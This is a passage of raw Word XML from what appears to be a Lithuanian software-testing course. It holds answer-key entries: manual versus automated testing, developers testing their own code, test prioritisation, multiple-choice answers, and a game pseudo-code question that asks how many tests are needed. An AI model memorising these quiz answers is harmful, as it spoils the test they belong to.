              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="263" w:name="_Toc14392484"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Labai tinka, kai reiki</w:t>
            </w:r>
            <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>a testuoti į vartotoją orientuot</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>us sprendimus;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="263"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="264" w:name="_Toc14392485"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Leidžia atlikti obseracinį testavimą;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="264"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="265" w:name="_Toc14392486"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Tinka, kai nereikia atlikti pakartotinų veiksmų (t.y. testai vykdomi vieną ar du kartus);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="265"/>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:bookmarkStart w:id="266" w:name="_Toc14392487"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
            <w:bookmarkEnd w:id="266"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="267" w:name="_Toc14392488"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Testų automatizavimas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="267"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="268" w:name="_Toc14392489"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Greitas, būdas atlikti daug testų;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="268"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="269" w:name="_Toc14392490"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Tinka kai reikia daug pakartotinų veiksmų ir testai vykdomi dažnai;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="269"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="270" w:name="_Toc14392491"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Patikimas, nėra žmogiškų klaidų testų vykdymo metu;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="270"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="271" w:name="_Toc14392492"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>…</w:t>
            </w:r>
            <w:bookmarkEnd w:id="271"/>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Taip. Nesvar</w:t>
      </w:r>
      <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>u, kokią patirtį programuotojas yra sukaupęs, mes visi pridarome</w:t>
      </w:r>
      <w:r w:rsidR="00595149" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">klaidų. Programuotojas būtinai turi ištestuoti savo </w:t>
      </w:r>
      <w:r w:rsidR="001122CC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>kodą, prieš išsaugodamas arba į</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>diegdamas į testavimo aplinką. Taip pat, gerosios praktikos teikia, kad programuotojas turi</w:t>
      </w:r>
      <w:r w:rsidR="001122CC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> parašyti testus komponentui, ku</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ri programuoja. Net, jei yra susit</w:t>
      </w:r>
      <w:r w:rsidR="002D1768" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>arimas, jog komponentų testus ku</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ria testų automatizavimo specialistai (nors tai yra retas at</w:t>
      </w:r>
      <w:r w:rsidR="002D1768" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vejis), programuotojas privalo į</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>sitikinti, kad jo kodas atitinka reikalavimo įgyvendinimo užbaigtumo/priėmimo kriterijus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a)$112 b) $99.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>b), c), d).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Taip, svarbu. Visais įmanomais atvejais stengiamės priori</w:t>
      </w:r>
      <w:r w:rsidR="002D1768" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>tet</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>uoti testavimą. Pradžioje stengiamės įvykdyti svarbiausius testus, kad kritiškiausią sistemos funkcionalumą patikrintume pirmiausia ir turėtume daugiau laiko klaidų ta</w:t>
      </w:r>
      <w:r w:rsidR="002D1768" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>isymui. Taip pat, dažnai, kruopš</w:t>
      </w:r>
      <w:r w:rsidR="00F36E14" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>čiai ištestuoti</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistemos negalime dėl laiko ir žmonių stokos, todėl pradedame nuo svarbiausio. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00CF60CE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Ką</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> daro žemiau pateiktas pseudo-kodas? Kiek skirting</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ų testų reikėtų</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> šiam kodui ištestuo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792"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510"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outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="272" w:name="_Toc14392493"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE35CD1" wp14:editId="666C7200">
                  <wp:extent cx="2478405" cy="2835910"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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78405" cy="2835910"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="272"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6344" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="273" w:name="_Toc14392494"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="273"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00CF60CE" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="274" w:name="_Toc14392495"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Tai ištrauka iš žaidėjo</w:t>
            </w:r>
            <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> kodo. Pirma salyga tikrina, ar žaidėjo valdomas erdvėlaivis atsitrenkė į asteroid</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>ą</w:t>
            </w:r>
            <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>. Jei atsitrenkė, tuomet atvaizduojamas sprogimas su garsu, “gyvybių” likutis sumažinamas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="274"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="275" w:name="_Toc14392496"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Antra salyga tikrina, ar dar liko “gyvybių”, jei taip, tuomet kartojamas žaidimas. Jei “gyvybių” nebeliko, žaidimas sustabdomas, atvaizduojamas žaidimo pabaigos pranešimas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="275"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="276" w:name="_Toc14392497"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Šiai kodo atkarpai ištestuoti užtektų 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> testų.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="276"/>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Kiek reikia testavimo atvejų, kad ištestuotume visą funkcionalumą pavaizduotą schemoje?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21FE4" w:rsidRPr="00AD4464" w:rsidRDefault="00E21FE4" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>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777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="407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center"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="277" w:name="_Toc14392498"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="695E5B6C" wp14:editId="63E62017">
                  <wp:extent cx="2120265" cy="2517775"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2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20265" cy="2517775"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="277"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
